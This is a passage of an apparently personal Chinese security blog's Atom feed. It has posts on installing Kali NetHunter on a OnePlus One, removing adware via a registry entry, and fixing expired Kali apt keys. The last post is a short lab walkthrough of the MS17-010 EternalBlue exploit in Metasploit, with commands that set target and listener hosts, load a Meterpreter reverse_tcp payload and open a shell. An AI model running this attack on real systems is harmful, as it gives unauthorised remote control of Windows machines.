<updated>2019-08-19T03:01:07.303Z</updated>
<content type="html"><![CDATA[<h1 id="一加1(bacon)-Kali-Nethunter安装指南"><a href="#一加1(bacon)-Kali-Nethunter安装指南" class="headerlink" title="一加1(bacon) Kali Nethunter安装指南"></a>一加1(bacon) Kali Nethunter安装指南</h1><h2 id="准备工作"><a href="#准备工作" class="headerlink" title="准备工作"></a>准备工作</h2><ol><li><h3 id="准备一加一手机"><a href="#准备一加一手机" class="headerlink" title="准备一加一手机"></a>准备一加一手机</h3><ul><li>解锁并刷到CM12并且开过一次机(我用魔趣也能成功,理论上来说任意6.0都行)</li><li><p>刷好TWRP recovery</p><a id="more"></a></li></ul></li><li><h3 id="官网下载刷机包"><a href="#官网下载刷机包" class="headerlink" title="官网下载刷机包"></a>官网下载刷机包</h3><hr><h4 id="夜版(nightly)"><a href="#夜版(nightly)" class="headerlink" title="夜版(nightly)"></a>夜版(nightly)</h4><p> 刷机包本体:<br> <a href="https://build.nethunter.com/nightly/2017.11-18-1618/nethunter-generic-armhf-kalifs-full-rolling-2017.11-18-1618.zip" title="ARM框架用" target="_blank" rel="noopener">https://build.nethunter.com/nightly/2017.11-18-1618/nethunter-generic-armhf-kalifs-full-rolling-2017.11-18-1618.zip</a></p><p> 内核:<br> 6.0 <a href="https://build.nethunter.com/nightly/2017.11-18-1618/kernel-nethunter-oneplus1-marshmallow-2017.11-18-1618.zip" title="安卓6.0" target="_blank" rel="noopener">https://build.nethunter.com/nightly/2017.11-18-1618/kernel-nethunter-oneplus1-marshmallow-2017.11-18-1618.zip</a></p><hr><h4 id="正式版(强烈推荐)"><a href="#正式版(强烈推荐)" class="headerlink" title="正式版(强烈推荐)"></a>正式版(强烈推荐)</h4><p> 刷机包本体:<br> <a href="https://build.nethunter.com/release/marshmallow/nethunter-oneplus1-marshmallow-kalifs-full-3.20-20170717-1810.zip" title="适用于一加1的正式版" target="_blank" rel="noopener">https://build.nethunter.com/release/marshmallow/nethunter-oneplus1-marshmallow-kalifs-full-3.20-20170717-1810.zip</a></p><hr></li><li><h3 id="刷机"><a href="#刷机" class="headerlink" title="刷机"></a>刷机</h3><ul><li>千万别双清,千万别双清,千万别双清(如果date被清了会刷写失败)</li><li>卡刷刷机包本体(正式版)</li><li>(如果是夜版先刷内核再刷刷机包本体)</li></ul></li></ol>]]></content>
<summary type="html">
<h1 id="一加1(bacon)-Kali-Nethunter安装指南"><a href="#一加1(bacon)-Kali-Nethunter安装指南" class="headerlink" title="一加1(bacon) Kali Nethunter安装指南"></a>一加1(bacon) Kali Nethunter安装指南</h1><h2 id="准备工作"><a href="#准备工作" class="headerlink" title="准备工作"></a>准备工作</h2><ol>
<li><h3 id="准备一加一手机"><a href="#准备一加一手机" class="headerlink" title="准备一加一手机"></a>准备一加一手机</h3><ul>
<li>解锁并刷到CM12并且开过一次机(我用魔趣也能成功,理论上来说任意6.0都行)</li>
<li><p>刷好TWRP recovery</p>
</summary>
<category term="kali" scheme="http://fdrag0n.github.io/categories/kali/"/>
<category term="kali" scheme="http://fdrag0n.github.io/tags/kali/"/>
</entry>
<entry>
<title>记一次解决某网站高速下载病毒</title>
<link href="http://fdrag0n.github.io/2018/02/11/%E8%AE%B0%E4%B8%80%E6%AC%A1%E8%A7%A3%E5%86%B3%E6%9F%90%E7%BD%91%E7%AB%99%E9%AB%98%E9%80%9F%E4%B8%8B%E8%BD%BD%E7%97%85%E6%AF%92/"/>
<id>http://fdrag0n.github.io/2018/02/11/记一次解决某网站高速下载病毒/</id>
<published>2018-02-11T03:19:04.000Z</published>
<updated>2019-08-19T03:01:11.640Z</updated>
<content type="html"><![CDATA[<h1 id="怒草流氓软件"><a href="#怒草流氓软件" class="headerlink" title="怒草流氓软件"></a>怒草流氓软件</h1><p>在某网站上下载软件,不小心用了高速下载,然后就被安装了流氓软件。<br>天天开机弹广告,还不是启动项,通过进程删掉流氓软件后每次开机出现explorer.exe警告,在网上搜索后找到解决方案。 </p><a id="more"></a><p>在注册表<strong>HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows</strong>里能找到和流氓软件对应地址的一个注册表项,删除此项,重启,问题解决。</p>]]></content>
<summary type="html">
<h1 id="怒草流氓软件"><a href="#怒草流氓软件" class="headerlink" title="怒草流氓软件"></a>怒草流氓软件</h1><p>在某网站上下载软件,不小心用了高速下载,然后就被安装了流氓软件。<br>天天开机弹广告,还不是启动项,通过进程删掉流氓软件后每次开机出现explorer.exe警告,在网上搜索后找到解决方案。 </p>
</summary>
<category term="病毒" scheme="http://fdrag0n.github.io/tags/%E7%97%85%E6%AF%92/"/>
</entry>
<entry>
<title>kali更新源问题解决方案</title>
<link href="http://fdrag0n.github.io/2018/02/06/kali%E6%9B%B4%E6%96%B0%E6%BA%90%E9%97%AE%E9%A2%98%E8%A7%A3%E5%86%B3%E6%96%B9%E6%A1%88/"/>
<id>http://fdrag0n.github.io/2018/02/06/kali更新源问题解决方案/</id>
<published>2018-02-06T04:17:06.000Z</published>
<updated>2019-08-19T03:01:20.656Z</updated>
<content type="html"><![CDATA[<h3 id="更换apt源后显示GPG错误-签名无效等"><a href="#更换apt源后显示GPG错误-签名无效等" class="headerlink" title="更换apt源后显示GPG错误 签名无效等"></a>更换apt源后显示GPG错误 签名无效等</h3><h5 id="问题描述"><a href="#问题描述" class="headerlink" title="问题描述"></a>问题描述</h5><p>Kali Linux由于太长时间未更新,而出现GPG错误 KEYEXPIRED 1425567400。经检查源未出现问题可以解析,deb也不冲突,就是密钥过期了!<img src="https://s1.ax2x.com/2018/02/06/vQvfJ.png" alt=""></p><a id="more"></a><h5 id="解决方法"><a href="#解决方法" class="headerlink" title="解决方法"></a>解决方法</h5><p>具体更新方法有以下几种方法:(任选一种即可)</p><pre><code>1、# apt-key adv --keyserver keys.gnupg.net --recv-keys ED444FF07D8D0BF6</code></pre><hr><pre><code>2、# wget -q -O - archive.kali.org/archive-key.asc | apt-key add</code></pre><hr><pre><code>3、# gpg --keyserver hkp://pgpkeys.mit.edu --recv-key ED444FF07D8D0BF6# gpg -a --export ED444FF07D8D0BF6 | sudo apt-key add -</code></pre><hr><pre><code>4、# wget https://http.kali.org/kali/pool/ ... ring_2018.1_all.deb# apt install ./kali-archive-keyring_2018.1_all.deb</code></pre><p>成功更新密钥之后,我们就可以正常的 update / upgrade 了。</p><p>然后在执行<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">apt-get update</span><br></pre></td></tr></table></figure></p><p>即可。<br><img src="https://s1.ax2x.com/2018/02/06/vQhal.png" alt="解决"></p>]]></content>
<summary type="html">
<h3 id="更换apt源后显示GPG错误-签名无效等"><a href="#更换apt源后显示GPG错误-签名无效等" class="headerlink" title="更换apt源后显示GPG错误 签名无效等"></a>更换apt源后显示GPG错误 签名无效等</h3><h5 id="问题描述"><a href="#问题描述" class="headerlink" title="问题描述"></a>问题描述</h5><p>Kali Linux由于太长时间未更新,而出现GPG错误 KEYEXPIRED 1425567400。经检查源未出现问题可以解析,deb也不冲突,就是密钥过期了!<img src="https://s1.ax2x.com/2018/02/06/vQvfJ.png" alt=""></p>
</summary>
<category term="kali" scheme="http://fdrag0n.github.io/categories/kali/"/>
<category term="kali" scheme="http://fdrag0n.github.io/tags/kali/"/>
</entry>
<entry>
<title>瞎搞的一次ms17-0100漏洞利用</title>
<link href="http://fdrag0n.github.io/2018/01/18/%E7%9E%8E%E6%90%9E%E7%9A%84%E4%B8%80%E6%AC%A1ms17-0100%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/"/>
<id>http://fdrag0n.github.io/2018/01/18/瞎搞的一次ms17-0100漏洞利用/</id>
<published>2018-01-18T02:22:42.000Z</published>
<updated>2019-08-19T03:01:29.009Z</updated>
<content type="html"><![CDATA[<h1 id="MS17-010"><a href="#MS17-010" class="headerlink" title="MS17-010"></a>MS17-010</h1><h2 id="前提条件:"><a href="#前提条件:" class="headerlink" title="前提条件:"></a>前提条件:</h2><p><strong>gem install ruby_smb</strong><br>—-ruby_smb模块安装<br><strong>msfupdate</strong><br>—-msf的更新<br><strong>msfconsole -qx “use<br>exploit/windows/smb/ms17_010_eternalblue”</strong><br>—-启动并加载模块</p><a id="more"></a><hr><h2 id="部署环境:"><a href="#部署环境:" class="headerlink" title="部署环境:"></a>部署环境:</h2><ul><li><strong>msfconsole</strong> </li><li><strong>wget <a href="https://raw.githubusercontent.com/backlion/metasploit-framework/master/modules/exploits/windows/smb/ms17_010_eternalblue.rb" target="_blank" rel="noopener">https://raw.githubusercontent.com/backlion/metasploit-framework/master/modules/exploits/windows/smb/ms17_010_eternalblue.rb</a></strong> </li><li><strong>cp ms17_010_eternalblue.rb /usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue.rb</strong> </li></ul><hr><h2 id="开始攻击"><a href="#开始攻击" class="headerlink" title="开始攻击:"></a>开始攻击:</h2><ul><li><strong>msfconsole</strong></li><li><strong>use exploit/windows/smb/ms17_010_eternalblue</strong> </li><li><strong>set rhost 192.168.21.128</strong></li><li><strong>set lhost 192.168.21.131</strong></li><li><strong>set payload windows/x64/meterpreter/reverse_tcp</strong></li><li><strong>exploit</strong> </li><li><strong>shell</strong></li></ul>]]></content>
<summary type="html">
<h1 id="MS17-010"><a href="#MS17-010" class="headerlink" title="MS17-010"></a>MS17-010</h1><h2 id="前提条件:"><a href="#前提条件:" class="headerlink" title="前提条件:"></a>前提条件:</h2><p><strong>gem install ruby_smb</strong><br>—-ruby_smb模块安装<br><strong>msfupdate</strong><br>—-msf的更新<br><strong>msfconsole -qx “use<br>exploit/windows/smb/ms17_010_eternalblue”</strong><br>—-启动并加载模块</p>
</summary>
</entry>
</feed>